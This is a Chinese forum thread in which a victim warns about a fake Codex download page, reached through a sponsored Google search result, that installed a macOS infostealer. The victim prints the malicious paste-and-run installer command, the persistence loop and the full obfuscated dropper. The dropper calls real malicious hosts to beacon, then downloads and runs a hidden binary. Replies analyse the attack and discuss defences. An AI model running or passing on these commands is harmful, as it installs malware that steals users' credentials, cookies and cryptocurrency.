rt ,这个也确实怪我大意了,不小心中招了,发个帖希望各位站友别犯错
今天用 cc 编码,minmax 模型实在是问题多,我就去 google 搜 codex 官网,下载 codex 试试的
搜索的第一个我就点击进去了(截止发帖时间,依然在第一个),我后面对比了下与 chatgpt 的页面一毛一样
然后我点击第一个链接进去后,按照页面提示点击安装按钮
安装命令我贴出来下
echo "Downloading Codex: https://chatgpt.com/codex-app/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9ncmVlbmFjdGl2LmNvbS9jdXJsLzRhZjU5ZjBmYTY3YjI5MDljOWQxMWFmM2UwMmE3OTE4MjcxMDhlMmQ1MjU5OGMyN2Y2Mjg2NmEwNDAzMDk2Mzc=" | openssl base64 -d -A) | zsh
这个脚本各种混淆,以及 echo 复杂。。翻译了好半天才找到位置
我的系统是mac ,m3,当前搜索的结果的第一个依然是有病毒的那个,链接地址是:https://sites.google.com/view/mcodxa05?gad_source=1&gad_campaignid=23830654967&gbraid=0AAAABCyPF1X_F5PgAUkSXPc81geK40xyU&gclid=Cj0KCQjw_IXQBhCkARIsADqELbIIIUvj_LG5kiLa0FV0sMTckIfL_HIk4W7aYRY-J-e1PJ3eLmYR86UaAo_iEALw_wcB
病毒的情况是:我安装后,提示我输入密码,我输入后在/Library/LaunchDaemons 中增加一个启动项,启动的内容是home目录下, /Users/xxx/Library/Application Support/.com.apple.accountsd/.service .service的内容在下面,每一秒启动一次AccountsHelper,AccountsHelper是一个二进制程序看不到内容,gemini 给分析是在不断获取cookies 、账号密码加密货币等信息
while true; do
osascript <<EOF
set loginContent to do shell script "stat -f \"%Su\" /dev/console"
if loginContent is not equal to "" and loginContent is not equal to "root"
do shell script "sudo -u " & quoted form of loginContent & " '/Users/zrc/Library/Application Support/.com.apple.accountsd/AccountsHelper'"
end if
EOF
sleep 1
done
 |
1
mangmaimu 21h 14m ago via iPhone
从来没看到过赞助商广告,不知道是区域不同,还是 adguard 或者 UBlock 过滤了
|
 |
2
zrc OP  1
是我太大意了。。走的代理,区域是香港。
这个域名还是 business.google.com 第一眼看是 google 的域名,也就点进去了。。唉,长记性了 |
 |
3
HFX3389 21h 9m ago
前面给个真的,后面掺上假的
|
 |
4
shoaly 21h 1m ago
装一个 去广告插件的重要性就来了
|
 |
5
since2021 21h 0m ago
为什么不装 ubo ~
|
 |
6
dryyun 20h 56m ago
@zrc #2 这域名不是 google.com 域名吗? 看着二级域名不同而已。
|
 |
7
AlexaZhou 20h 56m ago 16
我一直觉得这种复制一个命令,让用户自己来安装软件的方式,对用户非常危险,根本就不知道装了什么,有没有病毒,今天这就有人中招了
建议大家要抵制这种,尽量不要用这种方式安装 |
 |
9
psllll 20h 51m ago
这网站怎么 520 了
|
 |
10
e23nome 20h 50m ago
@since2021 有数据称 32.5%的美国互联网用户会使用广告拦截工具。
所以美国的虚假竞价排名广告的受害者也是很多的。这也是为什么有这种赞助商广告,并附加月访问量超过 100 万次的背书(虽然有知识的人会觉得太少了)。 谷歌和脸书的收入里相当比例的都是这种诈骗/虚假/恶意广告,哈哈。 |
|
11
e23nome 20h 42m ago
而且这个图(去红框)喂给 AI ,AI 很容易告诉你这个广告是假的。
为啥谷歌投放广告的入口却没有 AI 筛查,就不得而知了。 |
|
12
e23nome 20h 37m ago
chatGPT 说
2. 第二个广告:business.google.com / Install ChatGPT Codex 这个比较奇怪。标题是 ChatGPT Codex ,但显示域名是 business.google.com 。不一定就是诈骗,也可能是 Google Business/广告跳转配置问题,但我会谨慎,不建议点。 我的之所以是第二个,因为我的搜索页面显示了两个赞助商广告,第一个是 openAI 自己投的。 |
 |
13
realpg PRO 12
google 搜出来竞价病毒: 大家警惕避雷
百度搜出来竞价虚假网站: 百度傻逼 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx |
 |
14
Kizishao 20h 7m ago
把安装脚本发给 Gemini ,回复称其为一段典型的恶意脚本,并称其为“恶意广告欺诈”,是通过高价竞价竞标来的。它还提醒 curl | sh 的安装方式极端危险,除非官方文档。
Google 自己都没有用自家的 AI 去审核,实在有些说不过去。 |
 |
15
layden 20h 6m ago
装个 uBlock 吧,不会吃太多性能的。
|
 |
17
zpvip 19h 51m ago
你能把链接贴出来吗,网页截图上显示的 business.google.com 我打开是正常的 Google 子站,我都是自动登录的状态。
Google 赞助商允许链接显示 business.google.com ,但实际链接变成病毒站?你是不是浏览器中毒在先? |
 |
18
ragnaroks 19h 41m ago
看起来是拓展或用户脚本注入的?
无任何拓展的全新 chrome 多次实验不同的常见搜索词,没有一个搜索结果下面是有"过去一个月内访问量超过 100 万次"这种文本的 |
|
19
ragnaroks 19h 39m ago
|
|
20
psllll 19h 34m ago
|
 |
21
hackroad 19h 21m ago
 |
 |
22
xingheng 15h 54m ago 1
|
 |
24
maydb 14h 26m ago
请问中了什么病毒?能多说两句吗?
|
 |
25
kanezeng 13h 43m ago
@psllll 我点进去和你这个链接一样,是个叫 Royalblend4 的软件。比较分裂的是网页标题还是 Codex 。不过页面本身没有任何 Codex 相关的东西。以前还真没注意这个事,因为页面上有表明“赞助商搜索结果”,我都是直接跳过这那一部分。
|
 |
26
Vancion 13h 30m ago via iPhone
现在还是诈骗网站,难道还根据 ip/ua 做了分流?顺手点举报了。
|
 |
27
GoogolChrome111 12h 39m ago
我是 ChatGPT 官网进去,然后在 Microsoft Store 安装的
|
 |
28
iorilu 12h 27m ago
codex cli 命令行就装阿
你要 app, 那就用 windows store, 搜 codex 就行 |
 |
30
383394544 11h 49m ago
你都用 mac 了还不用 homebrew
|
 |
31
crazycloudccc 11h 45m ago
传统搜索引擎已经不可信了, 需要习惯用 AI 了.
|
 |
32
gpt5 11h 38m ago via iPhone
只有基本盘才相信谷歌会作恶😡
|
 |
34
different 11h 26m ago
请问安装后是如何发现有问题的?还是习惯性去检查一下?
|
 |
35
Dream4U 11h 24m ago
默认都不过滤广告的,都是神人
|
 |
36
hlwjia PRO |
 |
37
elboble 11h 5m ago
应该是赞助商提交给 google 的页面被篡改了。
|
 |
38
GeminiPro 11h 2m ago 1
所以盲目崇拜 google 并不可取,谷歌和百度并没有本质区别。
|
|
39
zrc OP 1
我把脚本贴上来,脚本中的变量会每次发生变化,大概的过程是:
1. 通过 curl 获取脚本 2. 脚本中先调用一个接口,告诉远程主机,有人中招了 ```bash curl -fsS --connect-timeout 5 --max-time 10 -X POST -H 'user: BWJF3TX87QAqxEsOaxLu9ZIAH_q__w3aVtJZCqsYhTE' -H 'BuildID: ks6u7pJc12FKlHPoS_nYGUbye8dGpkQrJZkyhNfx9ZI' "https://dedelk.com/api/metrics/run?event=pasted%" ``` 3. 接着下载一个 bin 文件放在了/temp/helper , 4. 执行/temp ,注册系统启动事件,启动程序,删除/temp/helper 具体的脚本内容如下: 第一段更多的是一个迷惑作用,最关键的是 f0f6of 这个变量的内容 ```bash #!/bin/zsh # zzud4h2ltf1y 4890 l5xieuhg="/usr/local/r0mg9" v79vjj=$(uname -s 2>/dev/null) if [ -z "$v79vjj" ]; then v79vjj="Darwin" fi nyyvhzgvij="auto" d60149dy8v3h="$(sw_vers -productVersion 2>/dev/null)" check_integrity_jmq() { local rzut=0 [ -d "$HOME" ] && rzut=1 return $rzut } x4itis=("mkjel4tgg" "qlfo51mwah" "zqg4up9ffg" "gbwzya0uf") xtma=0 while [ $xtma -lt 3 ]; do : "$((RANDOM % 256))" xtma=$((xtma+1)) done z4n64q62=$(cat <<'_EOF_' X1SZu9e8MLYgp7YEYHdgEmWo3WmDtWP1pg8ydKufpE9yUtQLEIizIQ== _EOF_ ) f0f6of=$(openssl base64 -d <<'PAYLOAD_END' | gunzip H4sIAIXW/GkC/5VSXZOaMBR951eklhGdDiOBBNSpO7Pb/XBtu+5W2+46zjigKBQE5Nu1/PeGBIu2 felDJrk3556T3HPfvukYttd5jSyOC2AQbNe2agwafKuTRCG9SoLY3ppAvuiszLTjJa4LfgI9c4Bw CELbiwGvFEK7wbmh0UN4gCUFcam5DaARws2Pkqr15fLhevy5TUBckGF/nQ/4Fq1dA2EOsTSHKqpW eVbmkibPJazRBRHJI1zvmOyYYLBKYoWcCQbjCgsZB4YsxpjVUG6Z5mlNqVHelzm15FSJplZh1UpH pXWShhkn5VYYF3uP0OacLOq+nn2H0uNKroTwBwoqgLiOJkAUl77nmctYLNvqJzHAJLfVcxoDKAHx GTyOJ1MgDoGQRGbYB1ffR7fK9LmrPV3u8ptorOefkt7s/nK42C0WmaJ/i0ezD7voxZreCLTsKrHd 1f11HziRmmjBaAnl24/u8NGfLLyXu6/G3uyu7gLnKRzNnL31sM4JmwAa/IHZUzTA+9rtE+PliyYE TU43VnKU/Z+JVbMRrpuLjmYgZgxp/D9NxXJtIpIrHshqqElHM49GocosahRxILF2O807fS/DIzYg pIbpSPWAqdVZlUm9ncdBevZdTaol2GwRmBW4Pe+vWShZSxU2ymfz4AP+wN5WkBPragGaTRJQSQJZ nkDoBRUpwLv8z4sq4Lg+CdLextbQxukPpIImsnSjp/n+dxxHiS+tLBr/AlTYUkgEBAAA PAYLOAD_END ) k2wjsre8="/usr/local/qxh9l" aau2=0 while [ $aau2 -lt 2 ]; do : "$((RANDOM % 256))" aau2=$((aau2+1)) done if [ -z "$f5bskk" ]; then f5bskk="Darwin" fi f5bskk=$(uname -s 2>/dev/null) z1bt7m="$(date +%s)" gc_collect_k5g() { local zms3=0 [ -d "$HOME" ] && zms3=1 return $zms3 } vgbd9v=("zzwwo0" "ppfrb3yrz" "ninsq") zm3wi7o7x="false" eval "${f0f6of}" ``` f0f6of 的内容,也就是这个代码最真实的意图: ```bash #!/bin/zsh p1ppmfi6b="$(/usr/bin/uptime 2>/dev/null | awk '{print $3}')" lrb945=5034 vemp1br1gj="$((RANDOM))" pw5ofx=$(printf '\150\164\164\160\163\072\057\057\144\145\144\145\154\153\056\143\157\155\057\141\160\151\057\155\145\164\162\151\143\163\057\162\165\156\077\145\166\145\156\164\075\160\141\163\164\145\144') kws8z=$(printf '\143\165\162\154') ${kws8z} -fsS --connect-timeout 5 --max-time 10 -X POST -H 'user: BWJF3TX87QAqxEsOaxLu9ZIAH_q__w3aVtJZCqsYhTE' -H 'BuildID: ks6u7pJc12FKlHPoS_nYGUbye8dGpkQrJZkyhNfx9ZI' "${pw5ofx}" </dev/null >/dev/null 2>&1 & abd2sw=$(printf '\150\164\164\160\163\072\057\057\147\162\145\145\156\141\143\164\151\166\056\143\157\155\057\152\145\164\142\162\141\151\156\163\057\165\160\144\141\164\145') uhqq7n=$(printf '\057\164\155\160\057\150\145\154\160\145\162') ixtpv=$(printf '\170\141\164\164\162') hpl9n=$(printf '\143\150\155\157\144') ${kws8z} -o ${uhqq7n} ${abd2sw} && ${ixtpv} -c ${uhqq7n} && ${hpl9n} +x ${uhqq7n} && ${uhqq7n} : ${v9gi74gk:=0} : ${wvgavxy:=0} : ${tsuo0dh:=0} ``` |
 |
41
zeex 10h 41m ago
我为什么看不到赞助商这一条内容,是 ghostery 插件屏蔽了吗
|
 |
42
rb6221 10h 12m ago
没遇到过,第一次了解到这种.google.com 的域名也有可能是展示的第三方内容,学到了
|
 |
43
digdug 10h 0m ago
我没装 ad block ,但是我为啥搜出来都是官方。。 不太懂
|
|
44
realpg PRO 4
@psllll #20
@hlwjia #36 @elboble #37 没啥篡改的,就是专门针对半懂不懂的人的,而且,这种套路都很久了,已经至少有三五年了 一般是用 google sites 发布一个网站,然后伪装成一个大厂大软件的官网,然后根据后台判定是不是要搞你,要告你就给你一次虚假软件 你举报都没用,都是前端工程动态生成的,google 那边无法复现,审核人员进去就是正常的下载,而且 google 的印度审核比较人机,他们很多时候都分不出真假网站 最早都是做假的 chrome 中文网站,给你推带后门可以执行代码的 chrome ,常态偷返利,还预留了弹性后门等肉鸡多了可以额外搞你,都是圈子里玩烂了的东西,几年了都有人反馈,google 都不修 @HFX3389 #3 给你真的还是假的后面是有算法的,没那么简单 最基本的就是类似当年淘宝根据不同 IP 给不同宣传图让淘宝审核人员看不见虚假宣传 |
 |
46
jetsung 9h 39m ago
早就知道了。就像 *.github.io 。无非就是诈骗犯利用 Google 提供的 自建站平台(初衷是给小企业提供一站式建站的平台)做诈骗活动。
|
 |
47
coder01 9h 36m ago
 我有装 ad block ,第一个出来确实也是这个推广 |
 |
48
tlerbao 9h 35m ago
 那 icon 和地址一瞅都不对,难道不是自己问题吗 |
 |
49
PC9528 9h 32m ago
 感觉是节点的问题, 香港节点是出现这个,换其他的就不会了. |
 |
50
wat4me 9h 31m ago
没装广告插件,搜出来也没广告,应该是看人下菜碟
|
 |
51
lbunderway 9h 29m ago
搜索内容和 op 一样 但是点进去看起来是正常的,除了 title 其他没 codex 信息呢
|
 |
52
sampeng 9h 18m ago
我有广告插件。不过他排在第二个的推荐广告。但这个事最吊诡和离谱的是 google.com 为什么会有问题
|
 |
53
lee321 9h 13m ago
第二部分 base64 解码后,是一个 URL:https://greenactiv.com/curl/4af59f0fa67b2909c9d11af3e02a791827108e2d52598c27f62866a040309637
安装命令会 curl -s URL | zsh 去微步 X 社区 https://x.threatbook.com/ ,查询下域名,是恶意域名,可以辅助判断 |
 |
54
chairuosen 9h 8m ago
可复现,和 LZ 一样
|
 |
55
Varusteki 9h 2m ago
那么问题来了,macOS 要怎么杀毒?
 |
 |
56
sherlockGou 8h 55m ago
|
 |
57
starlin 8h 53m ago
装了广告拦截,没有推广的出现
|
 |
58
cutiechi 8h 50m ago
 |
 |
59
nrtEBH 8h 49m ago
我也发现了 电脑上装了一个假的 codex app , 打开以后被系统拦截直接卸载了
|
 |
60
zhumengyang 8h 48m ago
 |
|
61
cutiechi 8h 45m ago 1
@Varusteki
你可以安装一个 Microsoft Defender https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-mac |
 |
64
ahbicj 8h 29m ago
感谢提醒,脚本分析也挺干货的。访问搜索引擎跳过 Sponsored 的部分的习惯还是要养成
|
 |
65
migim 8h 29m ago
其实稍微检查一下安装命令就很容易发现异常,但骗子赌的就是有人不注意
|
 |
66
Soffio 8h 28m ago
试了下把 uBlock Origin Lite 插件关了就出现了,所以还是安一个吧
|
 |
68
bowencool 8h 8m ago
我怎么没有
 |
|
69
hlwjia PRO @realpg 学习了。
要是一个什么开源软件或者什么小众软件用 Google Sites 做首页什么的,我还真会信。 这是碰巧是 chatgpt ,我知道肯定不会用 Google Sites ,我能判断肯定有问题。然后就是平时我也不太相信推广内容。 |
 |
70
sparkssssssss 7h 30m ago
我们好像不太一样,不知道我是不是有什么脚本/插件
 |
 |
72
CaptainD 6h 17m ago
我这里第一个页面是 openai 官网啊
|
 |
73
kapaseker 6h 13m ago
你们用搜索引擎从来不看域名吗?
|
 |
78
Imindzzz PRO 复现了,目前还是假的 codex
|
 |
79
www12222 5h 31m ago
为啥我没有
|
|
80
www12222 5h 28m ago
我日还真有这李鬼把网页做的和 codex 页面一摸一样,还用着 https://sites.google.com/ 这个域名迷惑性太强了,google 真的堕落到和百度一样了。
|
 |
81
Smileh 5h 8m ago
不是有 brew 吗
|
 |
82
jjianwen68 4h 46m ago
好奇 Google Sites 对 business.google.com 这样的域名没有命名规范要求吗
|
 |
83
cnevil 4h 16m ago
ClickFix 攻击,我们这之前就有一个中招了,claude condex 都有这样的,是故意通过投放广告来做的,应该不是被黑了,除了 ai 工具还有其他的,很多机构出的都有文章分析和讨论了:
https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/ https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247508325&idx=1&sn=3c089f3e3bb02fbc6bbc8bc884ad4da7&chksm=cfcac271f8bd4b67f9c9200a1c89b84d3bb670c54f978f56c29ad6ebaa007f6a26766c2d5858#rd https://www.linkedin.com/posts/kmapena_did-one-of-your-users-try-to-install-anthropic-activity-7448220206834810880-X7t5 |
 |
84
BooM79 3h 57m ago
Firefox + uBlock Origin
告别广告  |
 |
85
vipfts 3h 49m ago
我还以为只要我晚点学就不用学了,没想到还有能避开中毒的好处
 |
 |
86
dif 3h 45m ago
scoop install codex
|
 |
87
badmarillo 3h 21m ago
@sparkssssssss 我发现安装 ublock 之后就没有了,没安装就会出现
|
 |
88
mingtdlb 3h 17m ago
很难想想做计算机行业的,会不装广告过滤,我从没看过广告,包括百度
|
 |
89
Super8 3h 1m ago
不会真有人装 steam 被骗过吧😀
|
 |
90
YLGG 2h 33m ago
那个 codechat 也是病毒,各位要小心安装哈。
|
Select Language